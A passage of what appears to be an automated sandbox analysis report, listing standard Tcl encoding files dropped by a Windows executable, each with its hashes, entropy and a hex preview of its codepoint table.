                                                                                                                                                                                                                                                    Preview:# Encoding file: macCroatian, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8.221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8.00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153.01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB.201300B7201A201E203000C2010700C101

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macCyrillic.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.3482225358368565
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8dTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmh:8dgmOEVIwAMiw/Pr5NY3k9nsmh
                                                                                                                                                                                                                                                    MD5:60FFC8E390A31157D8646AEAC54E58AE
                                                                                                                                                                                                                                                    SHA1:3DE17B2A5866272602FB8E9C54930A4CD1F3B06C
                                                                                                                                                                                                                                                    SHA-256:EB135A89519F2E004282DED21B11C3AF7CCB2320C9772F2DF7D1A4A1B674E491
                                                                                                                                                                                                                                                    SHA-512:3644429A9BD42ADC356E1BD6FCFABEE120E851348B538A4FE4903B72A533174D7448A6C2DA71219E4CD5D0443C0475417D54C8E113005DF2CA20C608DE5E3306
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macCyrillic, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.0430043104320433043404350436043704

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macDingbats.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1096
                                                                                                                                                                                                                                                    Entropy (8bit):3.8086748658227827
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:87JM0UmJvRjuyfqYCsUBOdXBCbtwHviANskNWkiXFtoE4OSFgHrBPkq:87KfmOEqYCs6CXRPiANHWkiXFt9XSMdf
                                                                                                                                                                                                                                                    MD5:EBD121A4E93488A48FC0A06ADE9FD158
                                                                                                                                                                                                                                                    SHA1:A40E6DB97D6DB2893A072B2275DC22E2A4D60737
                                                                                                                                                                                                                                                    SHA-256:8FBCC63CB289AFAAE15B438752C1746F413F3B79BA5845C2EF52BA1104F8BDA6
                                                                                                                                                                                                                                                    SHA-512:26879ABE4854908296F32B2BB97AEC1F693C56EC29A7DB9B63B2DA62282F2D2EDAE9D50738595D1530731DF5B1812719A74F50ADF521F80DD5067F3DF6A3517C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macDingbats, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.00202701270227032704260E2706270727082709261B261E270C270D270E270F.2710271127122713271427152716271727182719271A271B271C271D271E271F.2720272127222723272427252726272726052729272A272B272C272D272E272F.2730273127322733273427352736273727382739273A273B273C273D273E273F.2740274127422743274427452746274727482749274A274B25CF274D25A0274F.27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F.F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000276127622763276427652766276726632666266526602460246124622463.2464246524662467246824692776277727782779277A277B277C277D277E277F.2780278127822783278427852786278727882789278A278B278C278D278E278F.2790279127922793279421922194219527982799279A279B279C279D279E279F.27A027A127A227A327A427A527A627A727

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macGreek.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1093
                                                                                                                                                                                                                                                    Entropy (8bit):3.4271472017271556
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8dOTUmJvRju3ShVbsZiAMiZyb7P4Hlb7BMM2aSYjsSkUEkp1FsOSUTime:8kgmOEVIwAMiw/Pg7K23s0x1FsOJTime
                                                                                                                                                                                                                                                    MD5:14AD68855168E3E741FE179888EA7482
                                                                                                                                                                                                                                                    SHA1:9C2AD53D69F5077853A05F0933330B5D6F88A51C
                                                                                                                                                                                                                                                    SHA-256:F7BFF98228DED981EC9A4D1D0DA62247A8D23F158926E3ACBEC3CCE379C998C2
                                                                                                                                                                                                                                                    SHA-512:FB13F32197D3582BC20EEA604A0B0FD7923AE541CCEB3AF1CDE36B0404B8DB6312FB5270B40CBC8BA4C91B9505B57FB357EB875E8AFB3DB76DFB498CE17851ED
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macGreek, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8.00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC.2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7.039100B12264226500A503920395039603970399039A039C03A603AB03A803A9.03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153.20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F.03CD03B103B203C803B403B503C603B303B70

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macIceland.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.3292041026777457
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8KTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjY4g4JysAWD:8KgmOEVIwAMiw/Pf2YRMFBEszD
                                                                                                                                                                                                                                                    MD5:6D52A84C06970CD3B2B7D8D1B4185CE6
                                                                                                                                                                                                                                                    SHA1:C434257D76A9FDF81CCCD8CC14242C8E3940FD89
                                                                                                                                                                                                                                                    SHA-256:633F5E3E75BF1590C94AB9CBF3538D0F0A7A319DB9016993908452D903D9C4FD
                                                                                                                                                                                                                                                    SHA-512:711F4DC86DD609823BF1BC5505DEE9FA3875A8AA7BCA31DC1B5277720C5ABE65B62E8A592FC55D99D1C7CA181FDDC2606551C43A9D12489B9FECFF152E9A3DCF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macIceland, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE.00FD00B7201A201E203000C200CA00C100C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macJapan.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):48028
                                                                                                                                                                                                                                                    Entropy (8bit):3.3111639331656635
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:ehuW1PJnT9TO7RaQiPCLUKr7KBi9FrOLdtHJ:eZPV9KuqTxFGXp
                                                                                                                                                                                                                                                    MD5:105B49F855C77AE0D3DED6C7130F93C2
                                                                                                                                                                                                                                                    SHA1:BA187C52FAE9792DA5BFFBEAA781FD4E0716E0F6
                                                                                                                                                                                                                                                    SHA-256:2A6856298EC629A16BDD924711DFE3F3B1E3A882DDF04B7310785D83EC0D566C
                                                                                                                                                                                                                                                    SHA-512:5B5FBE69D3B67AF863759D92D4A68481EC2211FF84ED9F0B3BD6129857966DE32B42A42432C44B9246C9D0D9C4C546CD3C6D13FF49BD338192C24AD053C0602E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macJapan, multi-byte.M.003F 0 46.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macRoman.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1093
                                                                                                                                                                                                                                                    Entropy (8bit):3.3361385497578406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8TTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjBtRg4JysAWD:8TgmOEVIwAMiw/P32YRMTtRBEszD
                                                                                                                                                                                                                                                    MD5:30BECAE9EFD678B6FD1E08FB952A7DBE
                                                                                                                                                                                                                                                    SHA1:E4D8EA6A0E70BB793304CA21EB1337A7A2C26A31
                                                                                                                                                                                                                                                    SHA-256:68F22BAD30DAA81B215925416C1CC83360B3BB87EFC342058929731AC678FF37
                                                                                                                                                                                                                                                    SHA-512:E87105F7A5A983ACEAC55E93FA802C985B2B19F51CB3C222B4C13DDCF17C32D08DF323C829FB4CA33770B668485B7D14B7F6B0CF2287B0D76091DE2A675E88BD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macRoman, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02.202100B7201A201E203000C200CA00C100CB0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macRomania.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.342586490827578
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8tTUmJvRju3ShVbsZiAMiZyb7P4SNMVZSxOZFYRMdj/TAg4JysAWD:8tgmOEVIwAMiw/P3AtYRMFTABEszD
                                                                                                                                                                                                                                                    MD5:C9AD5E42DA1D2C872223A14CC76F1D2B
                                                                                                                                                                                                                                                    SHA1:E257BD16EF34FDC29D5B6C985A1B45801937354C
                                                                                                                                                                                                                                                    SHA-256:71AE80ADFB437B7BC88F3C76FD37074449B3526E7AA5776D2B9FD5A43C066FA8
                                                                                                                                                                                                                                                    SHA-512:74588523D35A562AD4B1AF2B570596194D8C5018D5B44C8BA2B1F6BAD422D06E90172B0E65BB975663F3A3C246BCF2F598E9778BA86D1C5A51F5C0A38A2670EC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macRomania, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E.221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163.202100B7201A201E203000C200CA00C100C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macThai.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1092
                                                                                                                                                                                                                                                    Entropy (8bit):3.539905812302991
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:88TUmJvRju3ShVbsZiAMiZyb7P4oJi8XPHmED43U/Tmh:88gmOEVIwAMiw/PNJpP43U0
                                                                                                                                                                                                                                                    MD5:163729C7C2B1F5A5DE1FB7866C93B102
                                                                                                                                                                                                                                                    SHA1:633D190B5E281CFC0178F6C11DD721C6A266F643
                                                                                                                                                                                                                                                    SHA-256:CEAD5EB2B0B44EF4003FBCB2E49CA0503992BA1D6540D11ACBBB84FDBBD6E79A
                                                                                                                                                                                                                                                    SHA-512:2093E3B59622E61F29276886911FAA50BA3AA9D903CAF8CB778A1D3FDB3D1F7DA43071AFC3672C27BE175E7EEBBC542B655A85533F41EA39F32E80663CAF3B44
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macThai, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899.FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD.00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F.0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F.0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F.0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F.0E400E410E420E430E440E450E460E470E480E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macTurkish.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.353168947106635
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8QjTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdD/g4JysD:88gmOEVIwAMiw/P32YRM9BEsD
                                                                                                                                                                                                                                                    MD5:F20CBBE1FF9289AC4CBAFA136A9D3FF1
                                                                                                                                                                                                                                                    SHA1:382E34824AD8B79EF0C98FD516750649FD94B20A
                                                                                                                                                                                                                                                    SHA-256:F703B7F74CC6F5FAA959F51C757C94623677E27013BCAE23BEFBA01A392646D9
                                                                                                                                                                                                                                                    SHA-512:23733B711614EA99D954E92C6035DAC1237866107FE11CDD5B0CD2A780F22B9B7B879570DB38C6B9195F54DAD9DFB0D60641AB37DFF3C51CF1A11D1D36471B2D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macTurkish, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F.202100B7201A201E203000C200CA00C100C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\macUkraine.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1095
                                                                                                                                                                                                                                                    Entropy (8bit):3.3460856516901947
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:8TzTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmq:8PgmOEVIwAMiw/Pr5NY3k9nsmq
                                                                                                                                                                                                                                                    MD5:92716A59D631BA3A352DE0872A5CF351
                                                                                                                                                                                                                                                    SHA1:A487946CB2EFD75FD748503D75E495720B53E5BC
                                                                                                                                                                                                                                                    SHA-256:4C94E7FBE183379805056D960AB624D78879E43278262E4D6B98AB78E5FEFEA8
                                                                                                                                                                                                                                                    SHA-512:863A667B6404ED02FE994089320EB0ECC34DC431D591D661277FB54A2055334DBEBCAAE1CA06FB8D190727EBA23A47B47991323BE35E74C182F83E5DEAA0D83B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: macUkraine, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.04300431043204330434043504360437043

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\shiftjis.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):41862
                                                                                                                                                                                                                                                    Entropy (8bit):3.4936148161949747
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:/huW1PJnT9TOZRaQiPCLUKr7KBi9FrOLdtY:/ZPV9KoqTxFGXY
                                                                                                                                                                                                                                                    MD5:8FBCB1BBC4B59D6854A8FCBF25853E0D
                                                                                                                                                                                                                                                    SHA1:2D56965B24125D999D1020C7C347B813A972647C
                                                                                                                                                                                                                                                    SHA-256:7502587D52E7810228F2ECB45AC4319EA0F5C008B7AC91053B920010DC6DDF94
                                                                                                                                                                                                                                                    SHA-512:128E66F384F9EA8F3E7FBEAD0D3AA1D45570EB3669172269A89AE3B522ED44E4572C6A5C9281B7E219579041D14FF0E76777A36E3902BFA1B58DC3DA729FA075
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: shiftjis, multi-byte.M.003F 0 40.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000850086008700000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\symbol.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.675943323650254
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:Sd0UmJvRjuLoVoMQVoRmSdsTAsSnP9Us+yw4VivXObCXv:afmOEVoMQVoRmosTHSP9U/ydmXwCXv
                                                                                                                                                                                                                                                    MD5:1B612907F31C11858983AF8C009976D6
                                                                                                                                                                                                                                                    SHA1:F0C014B6D67FC0DC1D1BBC5F052F0C8B1C63D8BF
                                                                                                                                                                                                                                                    SHA-256:73FD2B5E14309D8C036D334F137B9EDF1F7B32DBD45491CF93184818582D0671
                                                                                                                                                                                                                                                    SHA-512:82D4A8F9C63F50E5D77DAD979D3A59729CD2A504E7159AE3A908B7D66DC02090DABD79B6A6DC7B998C32C383F804AACABC564A5617085E02204ADF0B13B13E5B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: symbol, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002122000023220300250026220D002800292217002B002C2212002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.22450391039203A70394039503A603930397039903D1039A039B039C039D039F.03A0039803A103A303A403A503C203A9039E03A80396005B2234005D22A5005F.F8E503B103B203C703B403B503C603B303B703B903D503BA03BB03BC03BD03BF.03C003B803C103C303C403C503D603C903BE03C803B6007B007C007D223C007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.000003D2203222642044221E0192266326662665266021942190219121922193.00B000B12033226500D7221D2202202200F72260226122482026F8E6F8E721B5.21352111211C21182297229522052229222A2283228722842282228622082209.2220220700AE00A92122220F221A22C500AC2227222821D421D021D121D221D3.22C42329F8E8F8E9F8EA2211F8EBF8ECF8EDF8E

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\encoding\tis-620.enc

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):2.9763240350841884
                                                                                                                                                                                                                                                    Encrypted:false
